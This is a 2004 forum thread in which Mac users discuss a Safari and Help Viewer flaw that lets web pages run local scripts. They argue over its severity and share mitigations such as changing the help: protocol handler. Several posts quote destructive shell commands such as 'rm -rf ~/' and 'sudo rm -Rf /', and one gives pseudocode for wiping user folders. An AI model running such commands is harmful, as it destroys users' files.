Infoworld reports (http://www.infoworld.com/article/04/05/17/HNmacoshole_1.html) on a new security vulnerability that affects Mac OS X/Safari.

The vulnerability involves the ability for Safari to run arbitrary local scripts on an end-user's computer. In order to accomplish this, a Disk Images must first be downloaded from the "attacking" website but can be tied to a single click.

A demonstration can be found at insecure.ws (http://www.insecure.ws/article.php?story=2004051612423136).

Infoworld reports (http://www.infoworld.com/article/04/05/17/HNmacoshole_1.html) on a new security vulnerability that affects Mac OS X/Safari.

The vulnerability involves the ability for Safari to run arbitrary local scripts on an end-user's computer. In order to accomplish this, a Disk Images must first be downloaded from the "attacking" website but can be tied to a single click.

A demonstration can be found at insecure.ws (http://www.insecure.ws/article.php?story=2004051612423136).

I just read this article on another site, but thanks for the link. I did the demonstration and it indeed is a vulnerability.

I altered some of my settings for safari as was suggested but I cannot find where to alter this setting:

- change the help helper in InternetConfig (better protection)

If anyone could point in me in the right direction, that'd be much appreciated!

Cheers,

PolarbearTed

anyways, most people tend to not exploit os x security holes, do to the little amount of people it would harm, we are deemed as a group not worth the effort of a virus...

aethier

Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.

No. But at least Apple's issues are fewer, and patched quicker, than in Windows.

Besides, this issue may not even be real. I'm just now trying the demonstration and it doesn

Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.
You don't call the ability to run a rm -Rf / on your Mac critical??

Oh great why not tell them all how to do it!

Oh great why not tell them all how to do it!
If I wanted to be mean I'd post a script to email copies of itself to everyone in your mac address book launched from this exploit (it renders HTML using the Safari engine remember).

I can imagine it now - FREE XXX PR0N CLICK HERE!! *clickety*

Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and low and behold, we get two issues in a week. It is almost as we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.

I think you shouldn't look at it as such a bad thing, no operating system is going to be completely secure. So what, a couple of vulnerabilities come out every so often, but they are fewer and less dramatic then the worms and security issues some windows users need to deal with.

For those of you interested, I ran the script and it needs to be addressed, since dodgy stuff could be done. But follow the suggestions on the site.


PolarbearTed

Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and low and behold, we get two issues in a week. It is almost as we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.

It's not a "holier than thou" attitude, it's just how things really are. To quote an old phrase, if something is the truth then it ain't bragging. Despite the past week's events (which have been highly blown out of proportion BTW) I'll continue to take my chances with OS X over Windows any day of the week...

while this is unsettling at best, at lest the folks who took the time to make the test file had a sense of humor and named their .txt file "owned"

The only good thing about this is that it's REALLY easy to keep from happening.

It's not a "holier than thou" attitude, it's just how things really are. To quote an old phrase, if something is the truth then it ain't bragging. Despite the past week's events (which have been highly blown out of proportion BTW) I'll continue to take my chances with OS X over Windows any day of the week...

Oh, I agree, OSX is a far superior OS than Windows however sometimes, as members of the Mac community, we try to rub it in to the other guys a little too much. For the longest time, the rally cry of many was that OSX had no viruses/trojans/etc and we hammered this point to death when a OSX vs Windows argument would arrise. It was only time before somebody decided to drop us down a peg or two and we are now seeing the beginnings of this. I say we still should tell the world about how great an OS Apple has but perhaps we shouldn't be so matter-of-fact about it.

I don't know what would be worse - deleting data or emailing random iPhoto pics to random people on your address list...

This is rediculous. Comeon .. you can disable the feature in Safari to auto open the .dmg files. This is just like posting an .EXE file that is a virus or trojan or something on a website and clicking on it and telling it to open.

This comes down to "THE WEB", not Safari, not OSX, not Apple. If you are clicking on things, you should know what you're clicking on. You could sign your life away or do extreamly illegal things in a few mouse clicks if you are just happily clicking away.

Do we need to start advertising in schools like they did in the 80s with "Don't take candy from strangers."? Now we'll have it say, "Don't click on links on stranger's websites."

I have used Apple's since the Apple II and have always felt safer than using a PC. However, just because we have a small user base does not mean we are not vulenerable. There are many people who despise the Mac OS and would love to exploit its security flaws. We are lucky that we have these people exposing these flaws prior to any harm being done. The whole Intego thing claiming to have found the first trojan was sketchy and ridiculus, but, it is a good thing that people are willing to write proof of concepts to better secure our beloved OS. It is the publicity of these holes that will only make the Mac OS more secure. And to end, a quote from the website which posted this poc.

It is often like that with computer security problems, it's better to cut the problem at the root because you can never think of all the possibilities. Some things should be strictly forbidden (like executing code from within HTML, that's why Internet Explorer has sooo many problems: it uses language extensions, vb scripting and so on

I have been wary of Safari since its birth because of it's ability to run code, web integration is not needed. Keep the browser a browser and the computer harddrive private. Let users decide what is run on their computer, not some web programmer, not matter how noble their intentions.

This is the first one that I would call a vulnerability. It's pretty convoluted too. It looks like you have to download and automount the dmg before help runs and executes the script contained within. This is pretty hit and miss. Sometimes it works, sometimes it doesn't. The reason this is a vulnerability though is that a webpage can open an application external to the browser and tell it to perform an arbitrary command on the user's system. That part I do not like. Even if this particular attack has a decent chance of failing (but also a chance of succeeding), the arbitrary execution is a weak link just waiting to be exploited.

But, if you just disable the opening of "safe" files automatically, that will protect you for now. I just think it's only a matter of time before somebody exploits Help to do something really dangerous.

You don't call the ability to run a rm -Rf / on your Mac critical??


It would not be as horrible as you think... Most people do not run Safari as root. Running that command would only delete things that you had write permission in. Now, doing:

rm -rf ~/ would surely piss a few people off.

This is rediculous. Comeon .. you can disable the feature in Safari to auto open the .dmg files. This is just like posting an .EXE file that is a virus or trojan or something on a website and clicking on it and telling it to open.There is NO way in Windows (no way that is not a bug) to bypass an alert window after clicking on a link that points to an .exeIt would not be as horrible as you think... Most people do not run Safari as root. Running that command would only delete things that you had write permission in.Oh great... So you are implying that the script cannot delete my system, which I can reinstall anytime, only all my private documents, music, photos, etc... which cannot be "reinstalled" unless you've got a backup of the >100GB HDD that usually ship today. A really positive remark...

It would not be as horrible as you think... Most people do not run Safari as root. Running that command would only delete things that you had write permission in. Now, doing:

rm -rf ~/ would surely piss a few people off.

rm -Rf / would do the same thing, except to all files you could delete, not just limited to your home folder. The OS can always be reinstalled. Your files and configs cannot be so easily.

Isn't this just running a program that will kill everything in the user folder. Still takes the user to click on it, it only affects the user and not the whole system, doesn't replicate to other computers.

But I like to know about these things, even though its manual download and start of the program. So its a like guessing if someones freeware open source stuff is not going to bight you.

I would like to point out that this will happen with *ANY* browser or download manager on OS X and not just Safari.

It's rather clever actually :)

If I wanted to be mean I'd post a script to email copies of itself to everyone in your mac address book launched from this exploit (it renders HTML using the Safari engine remember).

I can imagine it now - FREE XXX PR0N CLICK HERE!! *clickety*

your point exactly.

most viruses, etc, spread through the principles of social engineering. gullible, non-thinking sheepeople spread viruses.

anyone with a brain will never be caught by anything like this.

Oh, I agree, OSX is a far superior OS than Windows however sometimes, as members of the Mac community, we try to rub it in to the other guys a little too much...I say we still should tell the world about how great an OS Apple has but perhaps we shouldn't be so matter-of-fact about it.

Actually, I've been critical of Microsoft not just because of its vulnerabilities but because of their response which has often been to break the feature rather than fix the initial flaw.
Apple's response to these challenges, especially if quick and accurate will do more for my confidence than the supposed lack of flaws. Every OS has flaws, but it is the vendor's reponse to the flaws that is important.
Think of it this way, an OS is a cruiseship continually fired upon by an enemy of pirates and miscreants. Sometimes the OS will take a hit, but it is the response to that hit: defend the damaged section, seal the hull, put out the fire or ignore it, dog the hatches and hope it will go away, that decides the ultimate vulverability of the OS.
So far Microsoft has been telling passengers that the ship is fine, to ignore the smoke and the guy with the parrot who keeps drinking all the martinis.

Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.


Oh please... there are lots of companies that make their money by finding only vulnerabilities in Linux or Windows.... All of these flaws need to be addressed, no matter how seemingly trivial.

Take a look outside the mac realm, and you'll see security is a _huge_ issue.

bet we see another vague "security update" in software update that "adds internal functionality to safari" or something like that...

I just think its funny how upset people get about viruses and and security on windows machines...i have windows XP (not SP1, either) that has not been updated since installation. I turned off the software update feature all-together when i built the machine, and it's stayed off. I have updated the graphics drivers a couple of times, but really, i just turned the free version of zonealarm on at day 1, and i've had zero security issues to date. Once every 3-4 months i run an online virus check, and i've never had anything on my machine except spyware...which usually came from downloading something i shouldn't have, if you follow.

I sit on a cable connection all day long and somehow have never had to deal with a windows security problem.

maybe it's because i don't use IE or outlook? opera all the way, baby!

that said...i'm pretty surprised by how easy it was to find such a serious problem in OS X's security...think about this set of easily-scripted actions for a second, if you will:

delete all files in user/Pictures
delete all files in user/Movies
delete all files in user/Music
delete all files in user/Documents
search for folders containing "backup" or "archive", etc and delete them
empty trash.

X
n=n+1
create text document "ow[n+2]ned.n."
save in random folder
go to X

(yes, i know the syntax is wrong, but you get the idea, and i don't want to post the correct syntax, anyway)

point being, there's plenty you can do to cause severe damage without actually going outside the bounds of the "secure" core system. Most mac users aren't going to be like "yeah, it deleted all of my files from the last 2 years, all of my music, photos, and movies, and filled up my entire hard drive with 4k randomized junk files that there is no easy way to remove, but at least it didn't get to my kernel! Man, is OS X secure. I'm sure glad i don't have to press 'remove spyware' once a month like those PeeeCeee guys!"

While it is true that this will not self-propogate, it is still very dangerous.

First thing, did the latest security update fix the problem associated with the trojan warning on April 9th?

If not, I can only imagine malware writers out there trying to combine this with that trojan proof of concept so that a .dmg or .app posing as a .doc or .pdf is automounted and/or executed.

This is a very critical flaw that will likely be fixed within the next few days. Either way, it still bothers me.

Hickman

I thought I didn't buy windows.... :mad:

...unless you've got a backup of the >100GB HDD that usually ship today...

You don't have one???
:D

Seriously, I always buy harddrives in pairs, one for using it, one for backing it up (plus a second independant back-up on a dedicated server).

Is this vulnerability only looking for items in your user folder?

If you had everything on a 2nd hard drive, would you be immune?

Is this vulnerability only looking for items in your user folder?

If you had everything on a 2nd hard drive, would you be immune?

This vulnerability can delete anything that you have access to on your local machine at the time of execution. It can even delete info on mounted network drives with some clever programming.

Hickman

A good thread on the topic:

http://forums.macnn.com/showthread.php?s=&threadid=213043&perpage=50&pagenumber=1

Conclusions:
The exploit is very serious. Remember, a malicious script would be a small file, so the dmg would download and mount very quickly.
Turning off "Open 'Safe' files after downloading" does NOT help, Safari mounts any disk prefixed with disk://
Someone filed a bug report on it two months ago.
It can affect more than safari because of the way the OS handles addresses.
The best solution, for now, is to download an app that will allow you to change the helper application for "help: " from HelpViewer to something such as Chess.

Also, from Slashdot it appears that the exploit only works on Panther...but don't count on it...

I just read this article on another site, but thanks for the link. I did the demonstration and it indeed is a vulnerability.

I altered some of my settings for safari as was suggested but I cannot find where to alter this setting:

- change the help helper in InternetConfig (better protection)

If anyone could point in me in the right direction, that'd be much appreciated!

Cheers,

PolarbearTed

isnt InternetConfig from OS9 days? oh well what they really meant was to change what application handles "help:". change it to something besides Help Viewer. http://www.clauss-net.de/misfox/misfox.html MisFox can do it. Just click on the "Protocol Helpers" tab. i used Address Book instead. anything will do. now click the example link and viola! nothing happens.

Edit: The MisFox site is in german but the program is in plain english

Is it just me or do these sites seem hell bent on finding ANYthing wrong with OS X. Has anyone actually run across this as being a problem? Any of these supposed CRITICAL security flaws? Nope, didn't think so.

Well, unless you have valuable data on your system, it's not really critical. You might have to reinstall all apps, but else... :rolleyes:

now that mac os x is gaining attention, groups out there are trying to prove that mac os x is not 100% protected from virus or attacks. This maybe try, but I bet mac os x is a lot more safer than windows or linux. Sure it's not 100% safe, but it's the safest OS out there.

that said...i'm pretty surprised by how easy it was to find such a serious problem in OS X's security...

Yeah... it only took 3 years. :rolleyes:

Flaws in OS X are nothing new. Some serious, some less so, some fixed quickly some less so, some appearing in the press all together in a bunch, some more spaced out. No OS is perfect and nobody (I hope) ever thought so.

Not of this approaches the grim reality of Windows--and NOT just because of target size, but because of fundamental and widespread problems on Microsoft's part.

OS X isn't perfect, just much, much better :)

Will we soon have to stop saying there are no Mac viruses? Will we soon have to say... there is ONE? :) Somebody has to be first! And when it happens, Macs will still be more secure than Windows.

There is another vulnerability using telnet, which on the Mac exists with pretty much all browsers, on Windows and Linux apparently only with Opera (pre 7.5). Clicking a URL can write a file to everywhere you are allowed to write and can overwrite any file (without warning) whoose name and path is known.

http://www.heise.de/newsticker/meldung/47324 (German)

Do we need to start advertising in schools like they did in the 80s with "Don't take candy from strangers."? Now we'll have it say, "Don't click on links on stranger's websites."

do you read the sourcecode of every page you visit?

isnt InternetConfig from OS9 days? oh well what they really meant was to change what application handles "help:". change it to something besides Help Viewer. http://www.clauss-net.de/misfox/misfox.html MisFox can do it. Just click on the "Protocol Helpers" tab. i used Address Book instead. anything will do. now click the example link and viola! nothing happens.

Thank you very much. This is helpful and I've passed it on to all of the os x people I know.

Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and low and behold, we get two issues in a week. It is almost as we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.
For a while I thought I was the only one concerned about the same thing. I made the very same comment about too much flag waving. It's pure STUPIDITY to spout off about in a public forum like a child screaming, "You can't catch me, you can't catch me!"

If someone, say a switcher, wants to know if it's true that Macs never get viruses, I suggest pointing them to Apple's website or to their local Apple store.

This is a P.R. game we can all participate in. Lay low, don't talk about it, deny, deny, deny...and hopefully the problem will eventually die out for another 6 or 7 years.

This is a P.R. game we can all participate in. Lay low, don't talk about it, deny, deny, deny...and hopefully the problem will eventually die out for another 6 or 7 years.

I disagree, ignorance is not a good security model, let them attack, attack and attack. There will be flaws, so let's find them and get them fixed.

Let's not worry when a flaw is found, it's natural that there will be some, however they should mostly be less severe than what is found on Windows and also fewer of them.

Cheers, Edward.

I disagree, ignorance is not a good security model, let them attack, attack and attack. There will be flaws, so let's find them and get them fixed.

Let's not worry when a flaw is found, it's natural that there will be some, however they should mostly be less severe than what is found on Windows and also fewer of them.

Cheers, Edward.

I would love to agree with you, but this is just too easy to exploit and delete all files that the user has permission to. Yes, the flaw will be fixed, but it is still very nasty.

Hickman

I make it a general practice not to auto-execute/open/extract anything that's downloaded, whether intentional or accidental. Just safer that way. :) Couldn't this problem be circumvented by simply unchecking the box "Open 'safe' files after downloading" in the General panel of Safari Preferences?

Remove the Help Viewer application from your System/Library/CoreServices folder.

Burn it to disk.

And/or change your permissions on the original to "yourname" and NO ACCESS for everything, lock it.

The program will be there, you or anything else can't run it.

Be sure to record the original permissions if you do this.

I make it a general practice not to auto-execute/open/extract anything that's downloaded, whether intentional or accidental. Just safer that way. :) Couldn't this problem be circumvented by simply unchecking the box "Open 'safe' files after downloading" in the General panel of Safari Preferences?

As already stated: no.

GO HERE AND BE AMAZED.. no disk image needed:
http://bronosky.com/pub/AppleScript.htm

NOTE THIS IS NOT HARMFUL.

This is much more serious than the articles let on. This security vulnerability in MacOS X affects all web browsers. There's a non-malicious example of the seriousness of the problem here:
http://bronosky.com/pub/AppleScript.htm
That just runs a harmless script (/usr/bin/du; exit) which scrolls a bunch of text and looks scary, but it could easily have been a script to wipe your home directory, and you could have had some serious data loss.

To fix the vulnerability, simply navigate to your [MacOS] X drive, go to the Library folder (not the one in your home folder, but the one in the root directory of your HD), and then to the Documentation folder, and rename the folder "Help" to something else (located at /Library/Documentation/Help). This will prevent people from linking to the script runner. This vulnerability is very serious, and doesn't even have to involve downloading a DMG. Once the "Help" folder is renamed, you won't be able to use the Mac Help center anymore, but at least you will not be at risk of having your data wiped by clicking on a link, or visiting a malicious site. DO THIS NOW!!!!!

Damn, Marco114 beat me to it...

No. But at least Apple's issues are fewer, and patched quicker

They reported it to Apple 23/02/04. That is HARDLY quick. And it is very serious:

rm -rf /

would be a nightmare.

And security through obscurity is never successful for long. That is why notification to Apple, VERY QUICK fix from Apple, publication is a good techinque. When 2 months go by without a fix though, publication to force a fix is required because if one person has found it, others probably have too.

Yeah... it only took 3 years. :rolleyes:

:rolleyes: Here's some vulnerabilities from 2001 through 2004:
2004-05-12: KAME Racoon Malformed ISAKMP Packet Denial of Service Vulnerability
2004-05-12: Racoon IKE Daemon Unauthorized X.509 Certificate
2004-05-11: Apple Mac OS X TrueBlueEnvironment Local Denial Of Service
2004-05-11: Apache Mod_SSL HTTP Request Remote Denial Of Service
2004-05-08: OpenSSL Denial of Service Vulnerabilities
2004-05-08: Sendmail Prescan() Variant Remote Buffer Overrun
2004-05-05: BSD Kernel ARP Cache Flooding Denial of Service Vulnerability
2004-05-04: Apple Mac OS X AppleFileServer Remote Buffer Overflow
2004-05-04: Apple Mac OS X CoreFoundation Unspecified Large Input
2004-05-03: Apple Mac OS X Server Administration Service Undisclosed Remote Buffer Overflow
2004-05-03: Apple QuickTime Sample-to-Chunk Integer Overflow
2004-04-08: OpenSSL ASN.1 Parsing Vulnerabilities
2004-04-07: Samba 'call_trans2open' Remote Buffer Overflow Vulnerability
2004-04-07: Libxml2 Remote URI Parsing Buffer Overrun Vulnerability
2004-04-06: TCPDump ISAKMP Decoding Routines Denial Of Service
2004-04-06: Apple Mac OS X Mail Undisclosed HTML Handling Vulnerability
2004-04-06: CUPS Unspecified Configuration Vulnerability
2004-03-29: TCPDump Malformed RADIUS Packet Denial Of Service
2004-03-29: TCPDump ISAKMP Decoding Routines Multiple Remote Buffer Overflow
2004-03-26: Multiple Vendor Internet Browser Cookie Path Argument Restriction Bypass Vulnerability
2004-03-09: RSync Daemon Mode Undisclosed Remote Heap Overflow
2004-03-06: Apple Safari Large JavaScript Array Handling Denial Of Service
2004-02-27: Apple Mac OS X Apple Filing Protocol Client Multiple
2004-02-24: Apple QuickTime/Darwin Streaming Server DESCRIBE Request Remote Denial of Service Vulnerability
2004-02-24: Apple Mac OS X PPPD Format String Memory Disclosure
2004-02-24: Multiple Apple Mac OS X Local And Remote Vulnerabilities
2004-01-27: Multiple Apple Mac OS X Operating System Component
2004-01-27: Apple Mac OS X TruBlueEnvironment Local Buffer Overflow
2004-01-20: Sendmail Ruleset Parsing Buffer Overflow Vulnerability
2004-01-12: Multiple Vendor Sun RPC xdr_array Buffer Overflow
2003-12-31: Apple MacOS X SecurityServer Daemon Local Denial Of Service Vulnerability
2003-12-23: Apple QuickTime/Darwin Streaming MP3Broadcaster ID3 Tag Handling Vulnerability
2003-12-22: Unix Shell Redirection Race Condition Vulnerability
2003-12-20: Apple MacOS X ASN.1 Decoding Unspecified Remote Denial Of Service Vulnerability
2003-12-20: Apple MacOS X fs_usage Unspecified Local Privilege Escalation Vulnerability
2003-12-20: Apple MacOS X AppleFileServer Unspecified Vulnerability
2003-12-20: Apple MacOS X DHCP Response Root Compromise Vulnerability
2003-12-20: Apple Mac OS X Panther Screen Effects Locking Latency
2003-12-20: MacOSX CD9660.Util Probe For Mounting Argument Local Buffer Overflow Vulnerability
2003-12-05: Apple Safari Web Browser Null Character Cookie Stealing
2003-12-05: AppleShare IP FTP Server RMD Command Denial Of Service
2003-12-05: OpenSSL Bad Version Oracle Side Channel Attack Vulnerability
2003-12-05: OpenSSL CBC Error Information Leakage Weakness
2003-11-20: Apple Mac OS X Jaguar/Panther Multiple Vulnerabilities
2003-11-19: Apple MacOS X Terminal sudo command Unauthorized Access
2003-11-05: Apple MacOS X Terminal Unspecified Unauthorized Access
2003-10-31: MacOS X Local Root Privilege Elevation Vulnerability
2003-10-29: Apple Mac OS X Multiple Vulnerabilities
2003-10-29: Apple Mac OS X 10.3 Unspecified Apple Quicktime Java
2003-10-28: Apple Mac OS X Insecure File Permissions Vulnerabilities
2003-10-28: Apple Mac OS X Core File Symbolic Link Vulnerability
2003-10-28: MacOS X Long Argv Value Kernel Buffer Overrun Vulnerability
2003-10-04: Multiple Vendor C Library realpath() Off-By-One Buffer Overflow Vulnerability
2003-09-27: Sendmail Address Prescan Memory Corruption Vulnerability
2003-09-23: Ntpd Remote Buffer Overflow Vulnerability
2003-09-04: Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
2003-07-28: MacOS X Third Party Application Screen Effects Password Protection Bypass Vulnerability
2003-07-24: Apple QuickTime/Darwin Streaming Server Script Source Disclosure Vulnerability
2003-07-24: Apple QuickTime/Darwin Streaming Server Directory Traversal
2003-07-24: Apple QuickTime/Darwin Streaming Server view_broadcast.cgi Denial of Service Vulnerability
2003-07-24: Apple QuickTime/Darwin Streaming Server parse_xml.cgi Source Disclosure Vulnerability
2003-07-24: Apple Mac OS X Server Workgroup Manager Undisclosed Insecure Account Creation Vulnerability
2003-07-22: CUPS File Descriptor Leakage Denial Of Service Vulnerability
2003-07-22: CUPS Image Filter Zero Width GIF Memory Corruption
2003-07-22: CUPS strncat() Function Call Buffer Overflow Vulnerability
Overflow Vulnerability
2003-06-25: Eric S. Raymond Fetchmail Multidrop Mode Email Header Parsing Heap Overflow Vulnerability
2003-06-13: Apple Mac OS X DSIMPORTEXPORT Information Disclosure Weakness
2003-06-10: BSD TCP/IP Broadcast Connection Check Vulnerability
2003-06-09: Apple AFP Server Arbitrary File Corruption Vulnerability
2003-06-09: Apple Mac OS X Server LDAP Authentication Clear Text Passwords Vulnerability
2003-05-23: Apple QuickTime/Darwin Streaming Server QTSSReflector Module Integer Overflow Vulnerability
2003-05-19: Apple MacOS X IPSec Policy By Port Bypass Vulnerability
2003-05-17: Apple Safari Common Name Certificate Validation Vulnerability
2003-05-15: Sudo Password Prompt Heap Overflow Vulnerability
2003-05-12: Apple AirPort Administrative Password Encryption Weakness
2003-05-06: OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
2003-05-06: OpenSSL ASCII Representation Of Integers Buffer Overflow
2003-05-06: OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability
2003-04-23: MacOS X DirectoryService Denial Of Service Vulnerability
2003-04-10: Apple MacOS X DropBox Folder Information Disclosure
2003-04-10: Apple MacOS X DirectoryService Privilege Escalation
2003-03-21: Apple Mac OS X Keychain Access Password Disclosure Weakness
2003-03-02: Multiple Vendor Sun RPC LibC TCP Time-Out Denial Of Service
2003-02-28: Apple QuickTime/Darwin Streaming Server parse_xml.cgi File Disclosure Vulnerability
2003-02-26: Apple QuickTime/Darwin Streaming Administration Server Parse_XML.CGI Directory Listing Vulnerability
2003-02-26: Apple Quicktime/Darwin MP3 Broadcaster Filename Buffer Overrun Vulnerability
2003-02-25: Apple MacOS Classic TruBlueEnvironment Environment Variable Privilege Escalation Vulnerability
2003-02-25: Apple File Protocol iDrive Administrator Login Weakness
2002-12-07: Apple Mac OS X Directory Kernel Panic Denial Of Service
2002-12-02: Multiple Vendor IPSec Implementation Denial of Service
2002-09-13: Mac OS X NetInfo Manager Unauthorized Access Vulnerability
2002-07-24: Apple MacOS iDisk Mail.APP Default Configuration Password Disclosure Vulnerability
2002-07-20: MacOS X SoftwareUpdate Arbitrary Package Installation Vulnerability
2002-05-18: MacOS X Sliplogin Buffer Overflow Vulnerability
2002-02-21: Apple MacOS 9 Classic Reverse DNS Lookup DoS Vulnerability
2002-02-08: Apple QuickTime Content-Type Remote Buffer Overflow
2002-01-18: Multiple Vendor FTP glob Expansion Vulnerability
2001-12-29: Apple Mac OS X PPP Authentication Credentials Disclosure
2001-10-31: MacOS 9.2 Local Internet Explorer Helper Application
2001-10-22: MacOS X NetInfo Manager Privilege Escalation Vulnerability
2001-10-09: Apple MacOS X Insecure Default Permissions Vulnerability
2001-09-11: Apple Macintosh OS X FBCIndex File Contents Disclosure
2001-09-11: Apple Macintosh OS X .DS_Store Directory Listing Disclosure
2001-09-04: Apple Mac OS X nidump Password File Disclosure Vulnerability
2001-08-15: Apple Open Firmware Insecure Password Vulnerability
2001-07-09: Windows 2000 Active Directory Authentication Vulnerability
2001-06-28: MacOS Personal Web Sharing Authentication DoS Vulnerability
2001-05-15: MacOS 9 Personal Web Sharing Remote DoS Vulnerability
2001-05-04: Apple MacOS Multiple Users Password Bypass Vulnerability
2001-03-15: rwhod Remote Denial of Service Vulnerability
2001-02-05: Crontab File Disclosure Vulnerability
2001-02-02: Apple Quicktime Plugin Remote Overflow Vulnerability
2001-01-25: FreeBSD ipfw Filtering Evasion Vulnerability


Because no one takes the time to exploit Apple vulnerabilites, doesn't mean it's not vulnerable. It means it's benefiting from obscurity. It may have fewer, but if you have 10 and patch them expediently, you're more secure than the one with 2 that doesn't patch for a long time. Unless you believe due to obscurity, you don't have to patch quickly. Currently how secure an OS is being measure by how fast it is patched once the vulnerability is known. Let's time this one...

I don't know what would be worse - deleting data or emailing random iPhoto pics to random people on your address list...
I think if I saw:
Enter your password when asked or we email your photos to your friends
sudo rm -Rf /
Password:


I'd give 'em what they're asking for...

damn. i ran the trial virus. even for a demo that worked fast. i tried to cancel the download but even that didnt work.

But, if you just disable the opening of "safe" files automatically, that will protect you for now. I just think it's only a matter of time before somebody exploits Help to do something really dangerous.

I am confused here...sorry...but even if you unselect the opening of "safe" files in Safari, won't you still suffer the problem when you go to open the installer or whatever it is/was that was downloaded?

Or does doing this just prevent a web site from having your browser download something you don't want or didn't choose and execute it by opening it automatically...maybe I just answered my own question?!?!

Johnny

I am confused here...sorry...but even if you unselect the opening of "safe" files in Safari, won't you still suffer the problem when you go to open the installer or whatever it is/was that was downloaded?

Or does doing this just prevent a web site from having your browser download something you don't want or didn't choose and execute it by opening it automatically...maybe I just answered my own question?!?!

Johnny

Yes, you answered your own question. This keeps the browser from launching whatever is in the .dmg automatically. You as the user could still run it by hand.

In any case, ignore what I said. As somebody else pointed out, disk images can still be mounted automatically even if that option is disabled. Get Misfox and change the program used for the help protocol to something else. I've changed it to chess.

Yes, you answered your own question. This keeps the browser from launching whatever is in the .dmg automatically. You as the user could still run it by hand.

In any case, ignore what I said. As somebody else pointed out, disk images can still be mounted automatically even if that option is disabled. Get Misfox and change the program used for the help protocol to something else. I've changed it to chess.

So I've changed the help protocol from using the Help Viewer to some other application. Now, it seems that the non-malicious example of this (found at http://bronosky.com/pub/AppleScript.htm) simply runs the other application that I've selected. How is this going to help me? Was it within the Help Viewer application that the vulnerability was found?

[Using 10.2.8]

You don't call the ability to run a rm -Rf / on your Mac critical??

The correct command is rm -rf ~, smartass.

It will help you because the other application you selected shouldn't run the AppleScript. HelpViewer can run Applescripts because Apple thought it would could be helpful. Also, you're in 10.2.8, so the demo shouldn't work in the first place (doesn't for me).

Let me say it again:

Unchecking "Open 'Safe' Files After Downloading" WILL NOT PROTECT YOU FROM A DMG MOUNTING! If the URL to the dmg is prefixed with "disk://" instead of "http://" it will mount anyway.

And the best solution is NOT to delete your Help folder. The best solution is to download an application and change the application that deals with "help:" to something more harmless than HelpViewer...something that won't execute AppleScripts. That way you still have HelpViewer if you ever need it.

It will help you because the other application you selected shouldn't run the AppleScript. HelpViewer can run Applescripts because Apple thought it would could be helpful. Also, you're in 10.2.8, so the demo shouldn't work in the first place (doesn't for me).

Let me say it again:

Unchecking "Open 'Safe' Files After Downloading" WILL NOT PROTECT YOU FROM A DMG MOUNTING! If the URL to the dmg is prefixed with "disk://" instead of "http://" it will mount anyway.

And the best solution is NOT to delete your Help folder. The best solution is to download an application and change the application that deals with "help:" to something more harmless than HelpViewer...something that won't execute AppleScripts. That way you still have HelpViewer if you ever need it.

Thanks - that's exactly the info I was looking for.

So what has Apple said to all of this?

No word from them yet.

Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and low and behold, we get two issues in a week. It is almost as we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this. you are correct, i think all of this "Mac OS can't get a virus" talk is nonsense, and only drives people to write viruses just to shut those people up. It's become the holy grail of virus writing in a sense, anyone can code a Windows virus, but to do damage on the Mac platform requires a respectable level of knowledge.

isnt InternetConfig from OS9 days? oh well what they really meant was to change what application handles "help:". change it to something besides Help Viewer. http://www.clauss-net.de/misfox/misfox.html MisFox can do it. Just click on the "Protocol Helpers" tab. i used Address Book instead. anything will do. now click the example link and viola! nothing happens.

Edit: The MisFox site is in german but the program is in plain english

I'm a Mac newbie... so how do I change the help protocol helper back to Help Viewer? I got misfox and can easily see how to change it to be Chess or any other app I know about. But to change it back to Help Viewer I have to be able to find the Help Viewer app using the file open (finder) dialog that misfox uses. I can't see anything called Help Viewer (except a classic version). What file on my hard drive is the OS X Help Viewer app?

The correct command is rm -rf ~, smartass.

Hmm, I typed in rm -rf ~, smartass. and it doesn't seem to work... ;) :p

What file on my hard drive is the OS X Help Viewer app?

/System/Library/CoreServices/Help Viewer

Does anybody feel that this, in part, is the Mac community's fault? We go on blabbing how we have no viruses/trojan horses/etc and low and behold, we get two issues in a week. It is almost as we dared them to come up with these and now that they have arisen, we are pissed b/c it seems the world is picking apart the Mac OS. Perhaps had we not had this "holier than thou" attitude, we wouldn't be worrying about this.

Oh, I agree, OSX is a far superior OS than Windows however sometimes, as members of the Mac community, we try to rub it in to the other guys a little too much. For the longest time, the rally cry of many was that OSX had no viruses/trojans/etc and we hammered this point to death when a OSX vs Windows argument would arrise. It was only time before somebody decided to drop us down a peg or two and we are now seeing the beginnings of this. I say we still should tell the world about how great an OS Apple has but perhaps we shouldn't be so matter-of-fact about it.

Forgive me for the semi-trolling rant but...

I love you leftbanke7... thank you for giving me some hope that not all Mac users are just Apple sycophants trying to justify their expensive computer purchases to each other. I'm waiting for the next G5 Powermacs to come out before I buy my first ever Apple computer. I'm not switching completely because I love my Opteron system and my Sun workstation (well, really I hate all operating systems equally, just for different ones for different reasons). I'm going to test the Apple water and trying to keep an open mind. But I swear, most of the people on here (and the Mac nerds I know in real life) make me scared to buy one because I don't want to be associated with this crowd, haha. I guess I just won't tell anyone I own a Mac.

